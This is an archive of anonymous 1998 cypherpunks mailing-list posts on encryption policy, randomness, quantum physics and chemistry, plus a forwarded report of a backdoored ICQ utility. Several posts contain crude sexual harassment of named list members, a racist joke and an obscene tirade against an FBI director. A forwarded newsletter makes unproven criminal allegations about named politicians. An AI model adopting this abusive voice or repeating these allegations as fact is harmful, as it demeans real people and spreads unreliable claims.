@_author: Anonymous 
@_subject: No Subject 
They're the ones who look the other way when high government officials
are involved with corruption (like illegal campaign fundraising, etc.).

@_date: 1998-01-27 01:36:34
@_author: Anonymous 
@_subject: cookies and spam 
Yes, and thank you for signing up the list for their spam.
cypherpunks/cypherpunks also works for dejanews, but at least I had the
sense to send the replies to alt.anonymous.messages.

@_date: 1998-01-27 02:20:20
@_author: Anonymous 
@_subject: Burning papers (fwd) 
As usual Jim, your posting is prolific but your science is lacking.
Since N2 is highly stable, CN ions are not an energetically favored result. Some amount may be produced, but CN- is highly reactive and will quickly
bind to whatever it comes in contact with (usually oxygen).  The only way
cyanide could escape in gaseous form is as HCN, however this cannot happen
because the hydrogen has a lower activation energy for combining with
oxygen, and thus the reaction is starved of free hydrogen by the time the
carbon begins to burn.  Various other nitrogen compounds are produced,
such as NOx, but this is true of all combustion and not limited to plastic.
A more likely (and deadly) result, which you did not mention, is sulfur
dioxide.  Most plastics don't contain sulfur, but rubber products may.
Sulfur dioxide combines with water to produce H2SO3 and H2SO4 (sulfuric
acid) which is quite toxic if inhaled.
Most smoke inhalation deaths result for particles clogging the lungs rather
than gases.  Cats have a tendency to hide when they feel threatened or
injured, an instinct which often imperils them in a burning building.
Also remember that computers have materials in them other than plastic, for
example lead and other heavy metals.  Batteries and electrolytic capacitors
are also sources of many toxic materials.
In short, it's not the plastic that's toxic, it's all the other crap (ink,
dye, glue, solder, batteries, dielectric, etc)

@_date: 1998-01-27 20:29:52
@_author: Anonymous 
@_subject: Latest Clinton dodge? 
Hash: SHA1
its Bubba
It figures that Dimitri would know this. He seems to know all
about Tim's and Sameer's and John Gilmore's penises too. Must be
all that extensive taste-testing...
 - Frondeur

@_date: 1998-01-27 23:03:15
@_author: Anonymous 
@_subject: Netscape 5 will be GPL'ed 
Or you can print those sections in a book and let some enterprising
foreigners OCR scan them.

@_date: 1998-01-28 02:49:39
@_author: Anonymous 
@_subject: Video & cryptography... 
Remember what your target is here.  (Focus, Pinky!)
The ultimate goal is that you're trying to convict a suspect of some wrongdoing in a courtroom, and you would like to use as evidence a piece of video footage.  But now, in addition to the old standard of "chain of possession" whereby a police officer logs when s/he receives the evidence, who has accessed it in the lab, storage, etc., you may now be required to establish the "truth" of the video -- was it forged, staged, or altered?  Can the defense convince a jury that a video is not what it appears to be?
Look at the O.J. case where they convinced people that a piece of DNA might not have been his.  What a load of malarkey they heaped upon those people, and shame on the prosecution for not going back and matching up another 50 markers, dropping the chances of an error from 1 in 3*10^12 to 1 in 3*10^60.  (Ultimately, it wouldn't have mattered of course because they pointed out other "flaws" in the chain of possession, specifically the FBI crime lab.  Why they might have had a *different* case with O.J.'s blood is beyond me...  They could have retested the DNA from every cell in evidence on that trial, found only Nicole's, Goldman's and Simpson's DNA, and STILL they would have gotten it thrown out, because jurors are incapable of understanding math.)
What this means to us is that, in a courtroom, a signed piece of digital tape will probably be accepted the same as an unsigned piece of analog tape.  The courts have already established precedent that says that the scientific method has less value than an overpriced lawyer.
Think about it:  what we strive for as a cryptographic proof means less than the unsworn audio tape from a 21 year old intern.  If some lawyer wants to challenge a piece of video, and can throw enough money at it, s/he's going to win.  You're better off spending money training the persons operating the VCR, because that's the defense's next point of attack.
The idea behind the digitally signed video frames is that the video "consumer" (the persons who shot and recorded the video) probably didn't edit the video to falsify some evidence, and that the person who built the camera is willing to go to court to testify that their video is not tampered with.  As a video "consumer", you're willing to pay for a witness from the video equipment supplier to come testify that you didn't edit their video.  It theoretically (in a certain, very limited subset of theory) eliminates the "Rising Sun" plotline where someone edited the digital video.
Now, we all know that since you can falsify the video by all kinds of other means, the only thing it really accomplishes is it adds a float to the parade going past the jury.  And whoever has the prettiest parade wins "justice", right?

@_date: 1998-01-28 05:12:58
@_author: Anonymous 
@_subject: Latest Clinton dodge? 
Is that like "if you don't get pregnant," it's not intercourse???
Gotta be a lot of virgins out there then.

@_date: 1998-01-28 10:32:45
@_author: Anonymous 
@_subject: State of the Union Address 
Just to make sure I'm not misinterpreted, I mean how much energy is required
or is liberated by a given reaction. I don't mean "...figure the energy,
requirements, or yields," or "figure the energy requirements or products it

@_date: 1998-01-28 11:49:38
@_author: Anonymous 
@_subject: State of the Union Address 
It has been fifteen years since I even opened a chemistry book, but I think
what you're looking for is called the "heat of enthalpy." You could find
this in most any intro-level chem book, and there's probably a whole
shitload of reactions listed in the _CRC Handbook Of Chemistry & Physics_.
Since HCl+NaOH is an acid-base reaction, you could also use something
called the "heat of neutralization." IIRC, that's something like 57 KJ/mol
for strong acids. But don't take my word for it; I'm Not A Chemist Any
More. P-Chem gave me a great appreciation for math and computers.

@_date: 1998-01-29 02:32:24
@_author: Anonymous 
@_subject: FWD --Progressive Review On-Line Report #70 (fwd) 
PROGRESSIVE REVIEW
ON-LINE REPORT January 26, 1998
WASHINGTON'S MOST UNOFFICIAL SOURCE
A service of the Progressive Review: 1739 Conn. Ave. NW Washington DC 20009
202-232-5544  Fax: 202-234-6222 E-mail: ssmith at igc.org  Editor: Sam Smith.
The Progressive Review On-Line and our archives are found on the Web at:
For a free trial subscription  to our hard copy edition and e-mail updates
send us your postal address with zip code(Sorry, foreign addresses will
receive e-mail edition only). To unsubscribe, send message with the word
Copyright 1998, The  Progressive Review. Matter not independently
copyrighted may be reprinted provided   you pay TPR your normal reprint
fees, if any, and give proper credit.
To discuss an appearance by Sam Smith before your group or on your campus,
contact The Progressive Review at 202-232-5544 or write ssmith at igc.org
AND NOW THE NEWS . . .
ACCESSORY AFTER THE FACT: THE MEDIA
AND THE CLINTON SCANDALS
Because it controls its own medium and can revise history at will, one
accessory after the fact in the Clinton scandals is almost certain to
remain unscathed: the media. From the beginning, journalists created a
fantasy portrait of Bill Clinton as a brilliant visionary, managerial
superman, and charismatic leader. During the New Hampshire primary in 1992,
the New Republic's Hendrik Hertzberg surveyed several dozen journalists and
found that all of them, had they been New Hampshire voters, would have
chosen Clinton. He suggested that, "the real reason members of the press
like Clinton is simple, and surprisingly uncynical: they think he would
make a very good, perhaps a great, president. Several told me they were
convinced that Clinton is the most talented presidential candidate they
have ever encountered, JFK included."
Not only was there no substantive evidence for such a conclusion, there was
plenty to suggest that Clinton was instead a politician of no fixed
philosophical or moral address, a man who began with compromise and
retreated from there, and a rampantly mundane governor. More importantly,
he was known to be less than honest, a sexual predator, and hung out with
some of the sleaziest types in his state.
"At the beginning of the 1992 campaign, few of us knew -- let alone
remembered -- anything about Bill Clinton. If we were not from Arkansas, we
had nothing for which to thank him. And our whirlwind relationship, our
arranged marriage, was under the constant control of the great American
matchmaker: the media. Clinton's past was not only unimportant to him, but
to us as well.
"In an earlier time, Clinton's non-history would have been an enormous
disqualification. Now it wasn't because Clinton had one huge edge over his
opponents: he looked and acted well on TV. Tom Harkin moved and spoke as
mechanically as the Energizer bunny; Kerry's personality and platform
remained a cipher; Tsongas talked funny; Brown was didactic; but Clinton
was at home.
"Against this advantage, facts faltered. The facts said that Clinton had
been an unexceptional governor. He could claim better prenatal care
programs and a decline in infant mortality, but at the same time the Center
for the Study of Social Policy would rate the state only 41st on children's
issues in general. Arkansas also ranked -- according to the Southern
Regional Council -- in the bottom ten percent of all states in average
weekly wages; health insurance coverage, state and local school revenue;
unemployment; blacks and women in traditional white male jobs;
environmental policy and overall conditions for workers.
"An examination of his record raised warning flags, not the least of which
were rocky relationships with labor and environmentalists. At the beginning
of the campaign Clinton came under attack by his state's AFL-CIO president
who (before the national union ordered him to shut up) sent around a highly
critical report on Clinton's record. Labor, said Bill Becker, should expect
Clinton's help only 25-30% of the time. And the League of Conservation
Voters ranked Clinton last among the Democratic candidates on conservation
"Greater attention to Clinton's record also might have brought to more
prominent notice the major tax increases during his tenure. Or the comment
by the union official who said that Clinton would slap you on the back and
piss down your leg. Or the tendency to waffle on issues. . . ."
There were still more serious questions, well summarized by Ambrose Evans-
Pritchard of London's Telegraph:
"The Clintons are attractive on the surface. As Yale Law School graduates
they have mastered the language and style of the mandarin class. It is only
when you walk through the mirrors into the Arkansas underworld whence they
came that you begin to realize that something is wrong. You learn that Bill
Clinton grew up in the Dixie Mafia stronghold of Hot Springs, and that his
brother was a drug dealer with ties to the Medilin Cartel. You learn that a
cocaine distributor named Dan Lasater was an intimate friend, and that
Lasater's top aide would later be given a post in charge of administration
(and drug testing) at the White House. You learn that Arkansas was a mini-
Colombia within the United States, infested by narco-corruption."
For such reasons, by the spring of 1992 I had become convinced that the
media portrayal of the Clintons was a fraud. Based on published material
available to any reporter in the country, I wrote a "Who's Who of Arkansas"
listing questionable individuals and institutions in the state and
illustrating their links. Included were Dan Lasater, Roger Clinton, Tyson's
Foods, Webb Hubbell, Buddy Young, the Arkansas Development Finance
Authority, the Worthen Bank, the Rose law firm, Stephens Inc, Larry Nichols,
Terry Reed, Jim & Susan McDougal, Gennifer Flowers, Mena, Ark., and even
Mochtar Riady. The names would become familiar.
The reporters who actual uncovered the Clinton scandals included Alexander
Cockburn, Ambrose Evans-Pritchard, Christopher Ruddy, Jerry Seper, J. D.
Cash, Hugh Sprunt, Michael Isakoff, Roger Morris, and Sally Denton. For
their troubles they were ridiculed, ignored, considered persona non grata
and called "wackos," "paranoids," and "conspiracy theorists." In at least
two cases -- a Isakoff''s piece on Paula Jones and a Roger Morris/Sally
Denton expose of Mena -- the Washington Post killed major stories just as
they were about to go into print, apparently on orders of top management.
It has been a shameful period in American journalism. Never have so many
journalists looked so determinedly away from the facts in order to maintain
a myth. And to this hour they continue. What follows is a listing of
Clinton-related stories that should have been investigated further or
gotten far more play than they did. It is a reminder that Bill Clinton has
not been the only problem we have had in Washington.
CLINTON UNCOVERED;
THE ORPHANED STORIES
OF WHITEWATER
STORIES KNOWN BEFORE
THE 1992 CONVENTION

@_date: 1998-01-29 05:17:44
@_author: Anonymous 
@_subject: Quantum teleportation and communication 
Tim May knows no more about quantum mechanics than he does about
cryptography.  He is wrong about the nature of the correlation between
the two photons.
Bell's theorem shows that if local realism (a technical concept which is
hard to deny) holds, then when Observer A changes the way he performs
his measurements, what Observer B sees does change.  It is completely
mistaken to think of the "two envelope" analogy as applying to quantum
correlations.  There is something much stranger going on here.
Don't trust what Tim May writes.  He is not only a hypocrite (complaining
about chemistry discussions while adding to an equally off-topic physics
thread), but a fool as well.

@_date: 1998-01-29 05:47:49
@_author: Anonymous 
@_subject: Planetary rovers, SETI and other musings, was Re: update.356 (fwd) 
True, but there are some other interesting effects which could be
explained by FTL communication, such as the fact that light diffracted
through two slits shows an interference pattern, even though one of
the slits is farther away than the light travel time from where the
pattern appears.
Then there's the fact that light appears to propegate faster in a region
of space 'starved' of virtual particles by the casimir effect.  That one
is a favorite among warp drive theorists. :)

@_date: 1998-01-29 09:01:58
@_author: Anonymous 
@_subject: EPR, Bell, and FTL Bandwidth (fwd) 
So, you agree with Tim May's statement that:
You agree with the foolish statement that the behavior of correlated
photons is no more weird than sending out two envelopes?  I thought you
had more sense than that.
Are you under the impression that opening envelopes can in any way
violate Bell's inequality, as measuring correlated photons can?  Please!
How do you explain the violation of Bell's theorem in QM?  What is your
nice, cozy, friendly, un-weird explanation?  I'm curious whether you are
going to sacrifice locality or reality.  Somehow I think you'll have to
go beyond what is necessary to explain the behavior of envelopes.

@_date: 1998-01-29 12:23:20
@_author: Anonymous 
@_subject: State of the Union Address 
I think you mean `a bone head chemistry class.' My old college book doesn't
have it either, and I took two semesters of the stuff...

@_date: 1998-01-29 19:06:46
@_author: Anonymous 
@_subject: EPR, Bell, and FTL Bandwidth (fwd) 
It's much worse than this.  The violation of Bell's inequality implies
that changes to the basis used to measure one particle cause changes in
the observed state of the remote particle.  Of course this can't be used
to transmit information; we all agree on that.  The remote particle has
a random orientation.  But the point is, Bell's theorem shows that the
remote orientation depends on how the local measurement is done.
This is not a matter of simply perceiving or deducing what the conditions
are at the remote branch, as in the envelope case.  A better analogy
would be an envelope which could be opened in two ways, from the top
or from the bottom.  If you open from the top then the remote envelope
will have the same contents as the local one, while if you open from
the bottom then the remote envelope will have the opposite contents.
In each case the contents are random; the remote observer has no
idea whether you opened from the top or the bottom.  But somehow
your decision on how to open the envelope (what basis to measure the
photon) is changing how these globally separated subsystems relate to
each other.  (This analogy isn't perfect, either, because it might seem
that magic changes to the local contents could make the envelope work.
Bell's reasoning shows that it is the remote photon's state which must
be altered by the choice of how to measure the local one.)
This is the fundamental flaw in the envelope analogy, which makes it
seriously flawed and misleading.  It gives the impression that some kind
of hidden variables (the contents within the envelope) can easily solve
the problem, when nothing could be further from the truth.  It papers
over one of the most mysterious facets of quantum mechanics, by making it
appear to be mundane.  It represents a fundamentally mistaken way to view
remote correlated particles.
OK, so you can't explain it.  Fine, it is indeed a mysterious phenomenon,
and no doubt you are correct that more insights will come in the future.
Now, compare this with the envelope analogy Tim May offered:
Are you at all tempted to resort to such language in trying to understand
how the envelopes could work?  Is it puzzling how we could open one here
and find a 1 and suddenly know that there is a 0 in the remote envelope?
Do we need to learn more about how measurements of envelope contents work
before we can begin to tackle this thorny philosophical conundrum?
Of course not!  The envelope case is transparently obvious.  There are
no puzzles here, no complexities, no confusion.  The only confusion
is in the minds of those who think that correlated envelopes have
anything to do with correlated photons, or that the hidden variables
which perfectly well explain what is happening with the envelopes shed
any light whatsoever on the workings of nonlocal QM systems.
No, the current argument is over how much of a jackass Tim May is.

@_date: 1998-01-31 08:28:27
@_author: Anonymous 
@_subject: Interesting Chemical Reaction 
Perpetual motion machines built on violations of thermodynamics involving
hemispherical and ellipsoidal mirrors have been around for years.  They
don't work.
The objects do not change temperature.
Trace a ray from each object.  In every direction, it hits an object which
is at exactly the same temperature as it is.  It may be itself, or it may
be the other object.  But in each case, the temperature is the same in all
directions.  The "sky" is the same temperature as the object, so it does
not change temperature.

@_date: 1998-01-31 14:12:33
@_author: Anonymous 
@_subject: Secure checksums 
Timmy May sits at his terminal dressed in five-inch stiletto heels, fishnet stockings, a gold-lame mini-skirt, a purple halter with girdle underneath to keep in his flabby gut, a Fredericks of Hollywood padded bra also underneath the halter, a cheap Naomi Sims pink afro wig, waiting to yank his crank whenever a black man responds to one of his inane rants.
        o   \ o /  _ o         __|    \ /     |__        o _  \ o /   o
       /|\    |     /\   ___\o   \o    |    o/    o/__   /\     |    /|\ Timmy May
       / \   / \   | \  /)  |    ( \  /o\  / )    |  (\  / |   / \   / \

@_date: 1998-01-31 18:40:54
@_author: Anonymous 
@_subject: stupid test (virus warning) 
The same could be said about anybody who actually thinks DOS/Windows
machines have any semblence of security what so ever.

@_date: 1998-07-03 00:35:17
@_author: Anonymous 
@_subject: Beginning of process of decrypting net-nanny files (fwd) 
Article 425292 of alt.religion.scientology:
Newsgroups: alt.religion.scientology
Lines: 100

@_date: 1998-07-06 23:35:05
@_author: Anonymous 
@_subject: no subject!Anti-National ID Bill 
Where is this?  Stalled.  Looks dead in the water.  Any further insights?
H.R.3261 SPONSOR: Rep Paul (introduced 02/25/98) SUMMARY: (AS INTRODUCED) Privacy Protection Act of 1997 (sic) - Amends title II (Old Age, Survivors
and Disability Insurance) of the Social Security Act and the Internal
Revenue Code to prohibit any Federal, State, or local government agency or
instrumentality from using a social security account number or
any derivative as the means of identifying any individual, except for
specified social security and tax purposes. Amends the Privacy Act of 1974 to prohibit any Federal, State, or local
government agency or instrumentality from requesting an individual to
disclose his social security account number on either a mandatory or a
voluntary basis. Prohibits any two Federal agencies or instrumentalities from implementing
the same identifying number with respect to any individual, except as
authorized under this Act. STATUS: Detailed Legislative Status                                                  House Actions
Feb 25, 98:
     Referred to the Committee on Ways and Means, and in addition to the
Committee on Government Reform and Oversight, for a period to
     be subsequently determined by the Speaker, in each case for
consideration of such provisions as fall within the jurisdiction of the
     committee concerned.      Mar 2, 98:
          Referred to the Subcommittee on Government Management,
Information and Technology.
Feb 25, 98:
     Referred to the Committee on Ways and Means, and in addition to the
Committee on Government Reform and Oversight, for a period to
     be subsequently determined by the Speaker, in each case for
consideration of such provisions as fall within the jurisdiction of the
     committee concerned.

@_date: 1998-07-07 11:41:03
@_author: Anonymous 
@_subject: Junger et al. 
Nevermind that source code is suppose to be "human readable" material that
is _translated_ into function instructions of machine code.
A play is normally considered 'protected' free speech under US law, but
what if robot was created which acted out the play and Gwin's argument was
extended to apply the situtation where a play performed. Would the play
itself no longer be a protected form of free speech, because it is seen as
"functional" instructions to the robot actor? Would the playwrite become
responsible for the robot's actions, such as killing a character/actor?
As a programmer, I have "acted out" source code myself, as part of the
debugging process. It is normally called "a walkthrough," so the difference
between source code and a play is not as broad as some people may view it.
I have followed the source code like a script, acting out the instructions
like stage directions in a play.
Does it matter who might 'read' the material, in regards to the protection
of free speech? Whether it is written so that Russians or computers might
be able to read it? If source code is written on a napkin, it can be
currently exported, but what if tomorrow a vendor announces a 'napkin
computer' which can directly read from napkins akin to a super-low densiy
floppy disc.

@_date: 1998-07-07 12:27:01
@_author: Anonymous 
@_subject: A note on the latest randomness quarrel 
* Never use "the lowest few bits" or (t1>t2)?1:0 for the actual random
number generation.
You only use things like that for estimating the amount of entropy in a
source. The number of bits of entropy in a pile of bits is one more than
the base-two logarithm of the average number of guesses required of a
badguy knowing your condidtioning routine, observing what it can, and
interfering with your generator to figure out the value of the bits in the
pile, so if your studies and statistical analyses estimate that it
requires 2^127 guesses to guess the output of your conditioning routine,
good for you, you've estimated that somewhere in its input are 128 bits of
entropy. Um, I digress...point is, don't use that output straight. Take twice as
much unconditioned input, non-random-looking stuff and all, as you
estimate your conditioning routine needs to produce a key's worth of
entropy and _hash_it_. Your conditioning routine can introduce some little
bias you didn't see or make some unnoticed mistake that lets through
predictable bits. Hashing can, too, but we've studied the hash functions
to make sure they're good a lot more than we've studied your conditioning
* A badguy's introduction of extra events doesn't poison your randomness.
A badguy could introduce a multitude of predictable-but-random-looking
events to make your generator close shop before it has enough
unpredictable events to get its entropy. However, that only works if extra
events make your generator stop collecting earlier. The amount of time it
spends collecting randomness shouldn't depend on _any_ output of the
generator, because that needlessly leaks entropy.
Also, a badguy could introduce two nearly-simultaneous events near the
beginning of the process, when it can be fairly sure that the wait between
its events and the previous event will make a zero or make the lowest few
bits of the delay between the bits match a certain value. (Interpreting
that sentence is left as an exercise to the reader :) However, you can
only do this in a system where your conditioning routine allows extra
events to cause the routine to output bad bets. However, if you hash your
raw data rather than using one of those conditioning routines, it's nearly

@_date: 1998-07-07 16:32:49
@_author: Anonymous 
@_subject: Apology 
Might have just posted a message intended for coderpunks to the list,
depending on whether toad still forwards.  Sorry.

@_date: 1998-07-08 14:29:06
@_author: Anonymous 
@_subject: No Subject 
I made another page, which details what Capital records did to Dark Side of
the Moon when they reissued on cd.  Guess what they covered-up.  :-)  Check it
The Desecration of 'The Dark Side of the Moon'

@_date: 1998-07-13 10:14:58
@_author: Anonymous 
@_subject: DirFBI: Danger of Encryption 
had the unmitigated gall of a lying Nazi Fuck to write:
In the face of such overwhelming evidence as virtually litters the landscape and graces more than one court docket,
how can Louis Fuck-the-Free open with such a bald-faced lie, unsupported by any data or argument whatsoever? His own agency, not to mention several "non-law-enforcement" agencies (is this the lawyer's catch in his assertion?) have been lobbying _vigorously_ and without letup for several years
now to "prevent the growing use of encryption." The whole
export control regime for encryption has as its sole purpose
to "prevent the growing use of encryption."
I'm all for a constitutional amendment that would put this kind of bald-faced lying by high public officials on the same footing as treason, with the same penalties.
It sure does! The lack of widely available, fully functional strong crypto is a national and individual weakness that allows control freak fucks like Louis to make a reach for the ultimate levers of control and cement us into the ultimate surveillance state, from which there will be no
 Right! Like you prevented TWA 800, Lockerbee, and
the ValuJet eaten in midair by illegally transported live oxygen canisters? Just HOW MANY AIRLINERS HAVE YOU SAVED,
you lying Nazi fuck?
Don't talk to us about the drug dealers... the ones who wouldn't be able to earn a penny if it weren't for the War on Drugs in the first place. We already know that the
pharmaceutical market value of a dose of heroin is something
like 25 cents, and that the only reason those addicts are
breaking into our homes and killing us on the streets is
because the GOVERNMENT has made it illegal for them to obtain their sleepytime meds at reasonable prices that even
a minimum-wage burger flipper could afford if he wanted to
waste himself that way.
No it isn't. It's not a solution to anything at all. It's the destruction of privacy through more heavy-handed tactics and intrusion into private affairs. It's the police state's
wet dream, second only to full, real time monitoring of everything and everything. One step at a time, though, eh,
lying Nazi fuck?
You must be taking some of those drugs your agents seize! If
there is one constant, one unchangeable feature of government
landscape, it is that NO POWER can be safeguarded against abuse, and that EVERY POWER will be abused, just some more
than others. This claim is an insult to the intelligence of
even the most retarded, obedient American. Your mother clearly didn't wash your mouth with a strong enough brand of
laundry soap to make an impression on your little proto-Nazi
We should really suspend the ENTIRE debate right now, pending
the prosecution and imprisonment of the thousands of FBI
personnel involved in past, DOCUMENTED violations of rights.
Before we even take you seriously I want to see the asses of
the SAs who have done "black bag jobs", who have killed and maimed men, women and children, who have instigated unlawful
acts by incompetents through agents provocateurs, AND their SACs, AND their authorizing DDs, etc., ALL LANGUISHING IN LEVEL 6 FACILITIES doing the the HARD TIME of multiple life terms they so richly deserve for having arrogantly and systematically violated their oaths of office and the laws of the land. Then and ONLY THEN can we "talk," you strutting, lying little Nazi fuck!
Utter Nazi rubbish! The truth is that if you _do_ get what you want, for the first time in the history of this country it will be unlawful or even impossible for Americans to secure their communications as they could in 1789 when the Constitution was ratified. It is _not_ the ability to protect communications and writings that is new -- it is the invasive technology and the windfall to you of communications and records being handled by third parties that is new. Your claim of being locked out by new technology not contemplated by the Constitution is false. What was not contemplated and now needs to be remedied is that conversations easily secured against eavesdroppers in 1789 are now easily overheard, and communications easily secured in 1789 are now easily violated. THAT'S what needs to be
fixed, NOT your inability to continue and expand your
totalitarian invasion of the natural rights of Americans
and others.
More bullshit! You want what you want when you want it and
you have been vigorously campaigning for new and expanded
powers to every ear on Capitol Hill that would listen, even
conducting closed briefings to make your one-sided case out of the light of public scrutiny. Admit it -- you're a
thorough-going weasel, and proud of it!
Oh, PLEASE! You have the security of naive Internet users
at heart? Is that what we're supposed to believe? Do you
really think we just fell off the turnip truck? The very
encryption you fear most, strong public key encryption that
you can't break and won't be able to break within the predicted lifetime of the universe, is presently available
over the Internet, AND THAT IS PRECISELY WHAT YOU DON'T LIKE,
you lying Nazi fuck!
HAVE YOU NO SHAME AT ALL, uttering bald-faced lies like that?
We know, too: freedom will continue to have a chance. You need to take a deep breath and consider that many people now
understand the sham in which you are involved. More and more
people are wondering why you don't just nail the truly bad
guys the way they have been nailed for millenia -- by good,
conventional police work. Bad guys have been apprehended since
time immemorial without resort to data-mining the databases and
eavesdropping on all forms of communication. Now, just because
technology allows you means of invasion never contemplated by
the Constitution, suddenly you can't do your job without
them? Utter nonsense! Lying Nazi fuck nonsense!
Louis J. FREEH (Louis J. FUCK-THE-FREE)
Dir., Federal Bureau of Investigation
(Generalisimo, Federal Bureau of Absolute Control)
Washington, July 10,1998
TruthIsAsPlainAsTheNoseOnYourLyingNaziFuckFaceMonger II

@_date: 1998-07-14 21:00:00
@_author: Anonymous 
@_subject: Message From Jim Bell 
Jim would like to thank those of you who have sent him
hidden files, as he requested.
However, he would appreciate it if you clueless fucks
would send the hidden files in *cakes*, not in floppy
[I told him it was a mistake to post to the Cypherpunks
AOL Distributed Node.]
Nobody Juno, eh?

@_date: 1998-07-16 14:48:47
@_author: Anonymous 
@_subject: DES-II-2 contest finished already! 
Will RSA pay if the DES-gilmo was used? Or was RSA playacting john?

@_date: 1998-07-21 02:12:56
@_author: Anonymous 
@_subject: Thanks, phlamers! 
* To: cypherpunks at toad.com
     * Subject: Re: Request To Be Phlamed
     * From: Reeza! (howree at cable.navy.mil)
GO THE FUCK AWA. NOW.
I would like to thank all of you who helped to test my new
PresidentialDeathThreatRemailer by sending your flames to
the above address, to be forwarded to the BlancHouse.
[Please note that the PresidentialDeathThreatRemailer logs
and forwards all headers with the messages.]
I put the PresidentialDeathThreatRemailer into operation only
after receiving assurances from Jim Bell's public defender
attorney that I am legally free to help people exercise their
right of free speech in this manner, and that it would not
adversely affect my military career, as long as I was careful
to forward only flames and death threats, while deleting any
pictures of officers fucking the living shit out of non-coms.
All donations to the PresidentialDeathThreatRemailer will be
donated to the IRS Jalapeno Vaseline Fund.
Reezone Ozone

@_date: 1998-07-23 23:05:22
@_author: Anonymous 
@_subject: Todd Bowers: Dumbass 
Actually, your being a complete dumbass overshadows your being 13.

@_date: 1998-07-27 06:16:10
@_author: Anonymous 
@_subject: No Subject 
Has anyone consider the possibility that the dude who
shot his way into the Capitol did so as a result of
his mental infirmities being _healed_ by DC water?
Has any family member been quoted as saying,
"Thank God! He's finally come to his senses."

@_date: 1998-07-30 23:55:36
@_author: Anonymous 
@_subject: Resources on how to track spammers 
These are two address I thought might be useful.
This is a guide on tracking down real addresses in
usenet faked posts.  Once you find the real addresses or at least have a
couple good guesses on what provider they use reply to their message and
it might be.  They can use message ID's and logs to check where the message
originated from.
this is the same for forged e-mail.
The reason I'm sending this is because of the fact that I almost never get
spam.  When I do I respond quickly and appropriately and the spam dies out.
When I joined and then posted to this list I was flooded with mail.
Personally I this has to be one of the stupided lists to spam.  How many
technical peopl that are interested in crypto are really gaing to respond
to some of these stupid ads

@_date: 1998-07-31 12:52:54
@_author: Anonymous 
@_subject: Secret Service With A Smile - SAHMD!!! / Pwd: lco 
*** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  ***********

@_date: 1998-07-31 20:59:58
@_author: Anonymous 
@_subject: No Subject 
I don't quite parse what you're saying here...?
(more reply below)
... The problem with XORing is that you might have a generator where bits are
interdependent in a way that causes entropy to be lost in the XOR. You
generally don't have this problem with the more involved mixing functions.
If the construction you use for distilling the RNG's output to a random
number works as a collision-free hash function, you can place a lower
bound on the amount of entropy in the output based on how long it takes to
simulate the biases in the RNG (I posted a somewhat confuberated
description of the reasoning to coderpunks -- basically, if the hash of
the simulation's output has little enough entropy, it means you can break
the hash; since you can't break the hash, the output can't have that
little entropy). Normally, though, you can get away with using pretty much
any nonlinear mixing function, even if it's not a good hash function.
An "entropy pool" setup where you can put entropy in and pull keys out at
will gets slightly more hairy...if you want to do that, I suggest you try
to contact someone who knows what he/she's doing. :)
Should that prove infeasible, key a stream cipher with the mixed entropy,
and, when you want to pull a key out, grab some stream cipher output; when
you want to drop entropy in, mix some stream cipher output with your new
entropy and rekey the stream cipher with the result (to save time, I'd
only do the rekeying right before I want a key containing the new
entropy). Probably a lot more complicated and slow than it needs to be,
but I think it lets you add any amount of entropy you want without fear of
an attacker somehow interfering with the generation.

@_date: 1998-07-31 23:43:35
@_author: Anonymous 
@_subject: Where do you roam? 
SC>>Source: Handgunner Magazine, Sept./Oct. 1998, page 154:
SC>Paladin sought to reverse the ruling of the U.S. Court of Appeals for the
SC>Fourth Circuit, whichfound that the book Hit Man: A Technical Manual for
SC>Independent Contractors enjoyed no FirstAmendment protection because, in
SC>that court's opinion (based in part on the stipulations of theparties), a
SC>jury could find that the book's content amounted to the aiding and abetting
SC>of criminalconduct. I've  been reading the Bible lately, and it's content has been aiding
abetting me in all kinds of criminal misconduct, like murdering a
crapload of Arabs and other assorted non-Jewish darkies.
Anybody think that the U.S. Court of Appeals for the Fourth Circuit is
prepared to refrain from being hypocritical, and rule that the Bible
not enjoy FirstAmendment protection?
The ApplePie Murderer
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  ***********

@_date: 1998-06-10 14:00:48
@_author: Anonymous 
@_subject: backdoor trojan in ICKill 
From: Bachrach (bachrach at netreach.net)
     To: BUGTRAQ at NETSPACE.ORG
    First off, I'm not 100% sure if this is the apropriate forum for
since it's not really a weakness, but rather a programmer who is putting
into some programs. Then again technically that's an exploits... Oh I
don't know. If this is the wrong place then I apologize profusely for
waste of bandwidth and plead ignorance, but here goes:
    Well, chances are none of you guys have ever used this program, or
heard of it, but there are alot (35,000) of people who have. I
downloaded it becasue I've been researching a lot of the weaknesses in
ICQ protocol, (which has become easier as time has gone on. :)) Anyway,
you run it, (ICKill), it creates a file in the directory called 1.exe
acts as a
fake explorer. 1.exe accesses your regedit database, and copies itself
windows/system. It changes the regedit so that the fake one will run on
startup. It acts mostly the same as the normal explorer with one very
crucial execption. It contacts a host (I still can't figure out which
and executes the commands that are embedded within a text file on the
computer. Anyone see it yet? Backdoor city. I contacted the author (who
his e-mail address in the readme), and he's the one who explained th
backdoor thing. He also told me a few other things that made me write up
this group.
    He said that he had gotten almost 35,000 different people's systems
calling up his computer at one point; essentuially he has backdoors to
35,000 systems accross the globe. When I asked him why he would go
all the trouble to do this he gave me two reasons:
1. IF (and he emphasized the if) he was a hacker he could use a couple
other people's computers as hops when hacking into a system. Kind of
for the sysadmin trying to trace a breaking huh?
2. To quote him "And the backdoors can auto-uptade themselves.. so
Imagine I
can code a virus like backdoor... Whoaaa! This will be like THAT
3. He also said "Imagine also.. 35,000 backdoored (yeah, I reached this
connections pinging or SYN flooding some server.."
Well if anyone out there is using or has ever used ICKill then get rid
it. I have actually set up a page on this to both inform people and
how to get rid of all traces of the program that I currently am able to
 That site also has all of
letters I wrote to him and he wrote to me if you want to see the entire
things. It's also got some other info I couldn't fit into this message,
including all of the mistakes the author made (guess he needed better
testing). My
last question is this: if one person has backdoors into thousands of
computer systems, doesn't that pose some sort of risk to the interent
community as a whole? There's one person who's been saying that I should
notify the FBI about this. As you can see  decided to start here first.

@_date: 1998-06-25 00:04:49
@_author: Anonymous 
@_subject: Skipjack extensibility 
NSA made a claim that Skipjack couldn't be extended past 80 bits of key. Most
plausible explanation to my mind is that they're lying. Second is that there is
an attack against a class of Skipjack-like ciphers that requires only a few
plaintexts and 2^80 operations. Third is that some common key-lengthening
tricks like those for 2-key-3DES, DES-X, and DEAL fail when applied to
Skipjack. I can hardly fathom one resistant to all three, but I guess it's
possible with NSA.
